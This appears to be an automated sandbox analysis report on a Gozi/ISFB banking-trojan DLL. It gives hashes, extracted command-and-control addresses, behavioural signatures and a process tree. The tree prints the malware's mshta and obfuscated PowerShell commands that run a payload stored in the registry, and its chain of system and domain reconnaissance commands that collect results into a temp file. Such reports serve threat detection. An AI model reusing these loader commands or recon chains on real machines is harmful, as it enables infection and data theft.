Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20220721-en locale:en-us os:windows10-2004-x64 system -
submitted
03-08-2022 09:30
Static task
static1
Behavioral task
behavioral1
Sample
62ea3f935563b.dll
Resource
win7-20220715-en
General
-
Target
62ea3f935563b.dll
-
Size
300KB
-
MD5
614e312af0e5de7c6b9819e3a1c766d4
-
SHA1
01e384618d8eadb244184e66e6450752ea0ceade
-
SHA256
982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
-
SHA512
362b32fbc61baf1c757f72d61e582e2741553eda4de022311757a0732a23edabafbcd6affdab97c49d5e1378587b16f1d6730fd9446c801d791056896414d302
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
37.120.206.71
37.120.206.84
193.106.191.163
-
base_path
/drew/
-
build
250240
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
37.120.206.91
37.120.206.95
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
-
base_path
/images/
-
build
250240
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation | mshta.exe
-
Suspicious use of SetThreadContext 6 IoCs
Processes:
powershell.exe, Explorer.EXE
description | pid | process | target process
PID 4384 set thread context of 2648 | 4384 | powershell.exe | Explorer.EXE
PID 2648 set thread context of 3444 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 set thread context of 3788 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 set thread context of 4408 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 set thread context of 5096 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 set thread context of 5000 | 2648 | Explorer.EXE | cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes:
net.exe, net.exe, net.exe
pid | process
4836 | net.exe
4216 | net.exe
3248 | net.exe
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 64 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exe, powershell.exe, Explorer.EXE
pid | process
4556 | regsvr32.exe
4384 | powershell.exe
2648 | Explorer.EXE
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXE
pid | process
2648 | Explorer.EXE
-
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
powershell.exe, Explorer.EXE
pid | process
4384 | powershell.exe
2648 | Explorer.EXE
-
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
powershell.exe, Explorer.EXE, WMIC.exe, RuntimeBroker.exe, tasklist.exe
description | pid | process
Token: SeDebugPrivilege | 4384 | powershell.exe
Token: SeShutdownPrivilege | 2648 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2648 | Explorer.EXE
Token: SeIncreaseQuotaPrivilege | 5064 | WMIC.exe
Token: SeSecurityPrivilege | 5064 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 5064 | WMIC.exe
Token: SeLoadDriverPrivilege | 5064 | WMIC.exe
Token: SeSystemProfilePrivilege | 5064 | WMIC.exe
Token: SeSystemtimePrivilege | 5064 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 5064 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 5064 | WMIC.exe
Token: SeCreatePagefilePrivilege | 5064 | WMIC.exe
Token: SeBackupPrivilege | 5064 | WMIC.exe
Token: SeRestorePrivilege | 5064 | WMIC.exe
Token: SeShutdownPrivilege | 5064 | WMIC.exe
Token: SeDebugPrivilege | 5064 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 5064 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 5064 | WMIC.exe
Token: SeUndockPrivilege | 5064 | WMIC.exe
Token: SeManageVolumePrivilege | 5064 | WMIC.exe
Token: 33 | 5064 | WMIC.exe
Token: 34 | 5064 | WMIC.exe
Token: 35 | 5064 | WMIC.exe
Token: 36 | 5064 | WMIC.exe
Token: SeShutdownPrivilege | 3444 | RuntimeBroker.exe
Token: SeDebugPrivilege | 4444 | tasklist.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXE
pid | process
2648 | Explorer.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
regsvr32.exe, mshta.exe, powershell.exe, csc.exe, csc.exe, Explorer.EXE, cmd.exe, cmd.exe, cmd.exe, cmd.exe
description | pid | process | target process
PID 428 wrote to memory of 4556 | 428 | regsvr32.exe | regsvr32.exe
PID 428 wrote to memory of 4556 | 428 | regsvr32.exe | regsvr32.exe
PID 428 wrote to memory of 4556 | 428 | regsvr32.exe | regsvr32.exe
PID 2216 wrote to memory of 4384 | 2216 | mshta.exe | powershell.exe
PID 2216 wrote to memory of 4384 | 2216 | mshta.exe | powershell.exe
PID 4384 wrote to memory of 4108 | 4384 | powershell.exe | csc.exe
PID 4384 wrote to memory of 4108 | 4384 | powershell.exe | csc.exe
PID 4108 wrote to memory of 3796 | 4108 | csc.exe | cvtres.exe
PID 4108 wrote to memory of 3796 | 4108 | csc.exe | cvtres.exe
PID 4384 wrote to memory of 3116 | 4384 | powershell.exe | csc.exe
PID 4384 wrote to memory of 3116 | 4384 | powershell.exe | csc.exe
PID 3116 wrote to memory of 3580 | 3116 | csc.exe | cvtres.exe
PID 3116 wrote to memory of 3580 | 3116 | csc.exe | cvtres.exe
PID 4384 wrote to memory of 2648 | 4384 | powershell.exe | Explorer.EXE
PID 4384 wrote to memory of 2648 | 4384 | powershell.exe | Explorer.EXE
PID 4384 wrote to memory of 2648 | 4384 | powershell.exe | Explorer.EXE
PID 4384 wrote to memory of 2648 | 4384 | powershell.exe | Explorer.EXE
PID 2648 wrote to memory of 3444 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 3444 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 3444 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 3444 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 3788 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 3788 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 3788 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 3788 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 4408 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 4408 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 4408 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 4408 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 5096 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 5096 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 5096 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 5096 | 2648 | Explorer.EXE | RuntimeBroker.exe
PID 2648 wrote to memory of 4292 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 4292 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 5000 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 5000 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 5000 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 5000 | 2648 | Explorer.EXE | cmd.exe
PID 4292 wrote to memory of 5064 | 4292 | cmd.exe | WMIC.exe
PID 4292 wrote to memory of 5064 | 4292 | cmd.exe | WMIC.exe
PID 4292 wrote to memory of 852 | 4292 | cmd.exe | more.com
PID 4292 wrote to memory of 852 | 4292 | cmd.exe | more.com
PID 2648 wrote to memory of 5000 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 5000 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 1984 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 1984 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 5060 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 5060 | 2648 | Explorer.EXE | cmd.exe
PID 5060 wrote to memory of 384 | 5060 | cmd.exe | systeminfo.exe
PID 5060 wrote to memory of 384 | 5060 | cmd.exe | systeminfo.exe
PID 2648 wrote to memory of 656 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 656 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 612 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 612 | 2648 | Explorer.EXE | cmd.exe
PID 612 wrote to memory of 4836 | 612 | cmd.exe | net.exe
PID 612 wrote to memory of 4836 | 612 | cmd.exe | net.exe
PID 2648 wrote to memory of 2040 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 2040 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 616 | 2648 | Explorer.EXE | cmd.exe
PID 2648 wrote to memory of 616 | 2648 | Explorer.EXE | cmd.exe
PID 616 wrote to memory of 4508 | 616 | cmd.exe | nslookup.exe
PID 616 wrote to memory of 4508 | 616 | cmd.exe | nslookup.exe
PID 2648 wrote to memory of 4624 | 2648 | Explorer.EXE | cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:5096
-
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵ PID:4408
-
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵ PID:3788
-
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2648
-
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
2⤵
- Suspicious use of WriteProcessMemory
PID:428
-
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4556
-
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ytyk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ytyk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name idjndxe -value gp; new-alias -name bifqcj -value iex; bifqcj ([System.Text.Encoding]::ASCII.GetString((idjndxe "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4384
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4108
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp" "c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\CSCD5E2C973230047EB9396AC76FA5C35C8.TMP"
5⤵ PID:3796
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3116
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F80.tmp" "c:\Users\Admin\AppData\Local\Temp\gonep1pl\CSCD127D4C758CE4227BCC828CF19FCFE9.TMP"
5⤵ PID:3580
-
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:4292
-
C:\Windows\system32\more.com
more
3⤵ PID:852
-
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵ PID:5000
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:1984
-
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:5060
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:656
-
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:612
-
C:\Windows\system32\net.exe
net view
3⤵
- Discovers systems in the same network
PID:4836
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:2040
-
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:616
-
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
3⤵ PID:4508
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:4624
-
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:2616
-
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:4208
-
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:4732
-
C:\Windows\system32\driverquery.exe
driverquery.exe
3⤵ PID:4616
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:1768
-
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:3476
-
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
3⤵ PID:4604
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:596
-
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:1976
-
C:\Windows\system32\net.exe
net config workstation
3⤵ PID:3012
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
4⤵ PID:2696
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:4904
-
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:428
-
C:\Windows\system32\nltest.exe
nltest /domain_trusts
3⤵ PID:332
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:2036
-
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:2456
-
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
3⤵ PID:2032
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:1360
-
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:1936
-
C:\Windows\system32\net.exe
net view /all /domain
3⤵
- Discovers systems in the same network
PID:4216
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:4156
-
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:1528
-
C:\Windows\system32\net.exe
net view /all
3⤵
- Discovers systems in the same network
PID:3248
-
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:2308
-
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C850.bin1 > C:\Users\Admin\AppData\Local\Temp\C850.bin & del C:\Users\Admin\AppData\Local\Temp\C850.bin1"
2⤵ PID:3640
-
C:\Windows\system32\systeminfo.exe
systeminfo.exe
1⤵
- Gathers system information
PID:384
Network
MITRE ATT&CK Enterprise v6
Downloads